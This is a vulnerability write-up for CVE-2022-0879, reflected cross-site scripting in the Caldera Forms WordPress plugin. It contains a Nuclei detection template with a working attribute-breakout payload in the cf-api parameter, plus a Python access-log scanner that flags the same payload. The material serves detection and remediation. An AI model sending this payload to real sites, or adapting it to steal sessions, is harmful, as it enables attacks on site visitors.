The Caldera Forms WordPress plugin before 1.9.7 contains a reflected cross-site scripting vulnerability: the cf-api parameter is neither validated nor escaped before it is reflected in responses, which lets an attacker execute arbitrary scripts in a victim's browser. Exploitation requires the attacker to craft a malicious request.
PoC code [publicly available]
id: CVE-2022-0879

info:
  name: Caldera Forms < 1.9.7 - Reflected Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
    Caldera Forms WordPress plugin < 1.9.7 contains a reflected cross-site scripting caused by lack of validation and escaping of the cf-api parameter in responses, letting attackers execute arbitrary scripts in victim's browser, exploit requires attacker to craft a malicious request.
  impact: |
    Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
  remediation: |
    Update to version 1.9.7 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0879
    - https://wpscan.com/vulnerability/10e8e92a-4e1d-4e9c-8b3e-e8c5e0e0e0e0
    - https://github.com/20142995/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0879
    cwe-id: CWE-79
    epss-score: 0.02229
    epss-percentile: 0.8404
    cpe: cpe:2.3:a:calderaforms:caldera_forms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
  tags: wpscan,cve,cve2022,wordpress,xss,caldera-forms,reflected,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/?cf-api=%22%20style=position:fixed;left:0;top:0;right:0;bottom:0;%20onmouseover=alert(1)%20x"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "onmouseover=alert(1)", "caldera", " style=position:fixed")'
          - '!regex(body, "value=[\"\\\\]*/?cf-api=")'
        condition: and
# digest: 4a0a004730450221009e2d43d6a780c4cde5cf98cd6af1786f40323c545012c31cc0d89fffa8e9f00102202a83d197e0c5512ca8d9914ab3d412bf971b750a49ecd9ae73456cd399b356e3:922c64590222798bb761d5b6d8e72950
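For sites that cannot be updated to 1.9.7 immediately, web server access logs can be reviewed for requests that abuse the cf-api parameter. The following is an added example, not part of the template or the plugin: it decodes the cf-api query value from combined-format log lines and flags attribute-breakout characters or inline handlers. The heuristics, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry: "GET /uri HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Heuristics assumed for this example: characters that close an HTML
# attribute or tag, and inline event-handler or style attributes.
BREAKOUT_RE = re.compile(r'["\'<>]')
HANDLER_RE = re.compile(r'\b(?:on[a-z]+|style)\s*=', re.IGNORECASE)

# Constructed sample log lines (documentation IP ranges, made-up form id).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2022:10:00:01 +0000] '
    '"GET /?cf-api=CF5e1a2b3c HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2022:10:00:05 +0000] '
    '"GET /?cf-api=%22%20style=position:fixed;left:0;top:0;right:0;bottom:0;'
    '%20onmouseover=alert(1)%20x HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2022:10:00:09 +0000] '
    '"GET /contact/?page=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def suspicious_cf_api(log_line):
    """Return the decoded cf-api value if it looks like attribute injection."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    # parse_qs percent-decodes each value before we inspect it.
    for value in parse_qs(query, keep_blank_values=True).get("cf-api", []):
        if BREAKOUT_RE.search(value) or HANDLER_RE.search(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_cf_api(line)
        if value is not None:
            hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious cf-api value {value!r}")
```

A hit shows only that a crafted request reached the server; whether the response reflected the value unescaped depends on the installed plugin version.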